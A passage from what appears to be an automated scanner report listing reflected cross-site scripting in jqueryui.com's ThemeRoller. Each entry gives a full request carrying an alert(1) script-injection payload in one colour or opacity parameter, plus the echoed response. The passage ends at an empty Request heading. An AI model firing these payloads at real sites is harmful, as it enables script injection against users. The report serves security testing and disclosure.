<form method="get" action="/ziring/cgi-bin/nsgate/gate.pl?49c6f"><script>alert(1)</script>c05ff7c7c01=1" enctype="application/x-www-form-urlencoded">
...[SNIP]...

3.13. http://jqueryui.com/themeroller/ [bgColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2240d"><script>alert(1)</script>2089f77dadf was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&bord
...[SNIP]...

3.14. http://jqueryui.com/themeroller/ [bgColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a715"><script>alert(1)</script>09e95dd3a22 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff3a715"><script>alert(1)</script>09e95dd3a22&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff3a715"><script>alert(1)</script>09e95dd3a22&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&border
...[SNIP]...

3.15. http://jqueryui.com/themeroller/ [bgColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4055f"><script>alert(1)</script>0399770b2a2 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e64055f"><script>alert(1)</script>0399770b2a2&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e64055f"><script>alert(1)</script>0399770b2a2&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

3.16. http://jqueryui.com/themeroller/ [bgColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17242"><script>alert(1)</script>bafb8efe2b6 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec17242"><script>alert(1)</script>bafb8efe2b6&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
2121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec17242"><script>alert(1)</script>bafb8efe2b6&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30
...[SNIP]...

3.17. http://jqueryui.com/themeroller/ [bgColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10edc"><script>alert(1)</script>d067a1b35af was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc10edc"><script>alert(1)</script>d067a1b35af&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc10edc"><script>alert(1)</script>d067a1b35af&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

3.18. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84d7e"><script>alert(1)</script>7a510e251a9 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
9999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&b
...[SNIP]...

3.19. http://jqueryui.com/themeroller/ [bgColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e8c7"><script>alert(1)</script>04593ff0f74 was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada1e8c7"><script>alert(1)</script>04593ff0f74&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada1e8c7"><script>alert(1)</script>04593ff0f74&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=
...[SNIP]...

3.20. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8aec"><script>alert(1)</script>bd9d43878e2 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaad8aec"><script>alert(1)</script>bd9d43878e2&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
efa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaad8aec"><script>alert(1)</script>bd9d43878e2&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&off
...[SNIP]...

3.21. http://jqueryui.com/themeroller/ [bgColorShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97187"><script>alert(1)</script>2b2f49b085a was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa97187"><script>alert(1)</script>2b2f49b085a&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa97187"><script>alert(1)</script>2b2f49b085a&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.22. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49013"><script>alert(1)</script>e719f071a57 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

